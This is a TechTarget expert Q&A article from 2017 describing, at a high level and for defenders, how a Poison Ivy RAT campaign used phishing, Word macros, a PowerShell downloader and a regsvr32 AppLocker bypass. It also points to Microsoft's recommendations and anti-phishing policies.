Q
Evaluate Weigh the pros and cons of technologies, products and projects you are considering.

Poison Ivy RAT: What new delivery techniques are attackers using?

A revamped Poison Ivy RAT campaign has been using new evasion and distribution techniques. Expert Nick Lewis explains the new attack methods that enterprises should look out for.

FireEye researchers found a Poison Ivy RAT campaign using new social engineering, evasion and distribution techniques...

to spread the malware, which is capable of key logging, password theft, and taking screen and video captures. What new attack and delivery methods should enterprises should be on the lookout for with this remote access Trojan?

Every victim of a successful attack wants to think that the most sophisticated techniques were used to compromise the security of their systems. The truth is sometimes vulnerabilities remain on systems for long periods of time and known security recommendations are not used for many different reasons, resulting in attackers gaining easy access to systems.

This isn't to say the attack was the victim's fault -- this is just the sad state of information security. While there have been many security changes with mobile devices and advancements made with desktops, many times, an attacker can just buy a zero-day exploit to achieve their goals.

FireEye researchers wrote about an attack using the Poison Ivy RAT, where a phishing email is used to get the victim to open a malicious Word document and execute a macro. The emails were targeted at individuals working in the Mongolian government and claimed the documents contained webmail login instructions or information on a state law proposal.

The macro used a PowerShell script that downloads malware from the internet, along with decoy documents to divert the victim's attention. The script writes its data to the registry, taking advantage of a vulnerability in AppLocker by using regsvr32.exe to install fileless malware on the endpoint.

Since PowerShell came out over 10 years ago, some thought it would be used for malware-based attacks. Microsoft has recommendations for stopping malicious PowerShell scripts that can be used to address attacks like this. Enterprises should also have policies or plans to defend themselves and their individual users against phishing attacks like the one used to spread this RAT. 

Next Steps

Learn how a remote access Trojan like GlassRAT remains undetected

Find out how the Trochilus RAT evades sandboxing to conduct cyberespionage

Read about how to handle phishing attempts on your employees

This was last published in July 2017

Dig Deeper on Malware, virus, Trojan and spyware protection and removal

PRO+

Content

Find more PRO+ content and other member only offers, here.

Have a question for an expert?

Please add a title for your question

Get answers from a TechTarget expert on whatever's puzzling you.

You will be able to add details on the next page.

Join the conversation

1 comment

Send me notifications when other members comment.

By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Please create a username to comment.

What has your enterprise's experience been with preventing RAT infections, such as Poison Ivy?
Cancel

-ADS BY GOOGLE

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchEnterpriseDesktop

SearchCloudComputing

ComputerWeekly.com

Close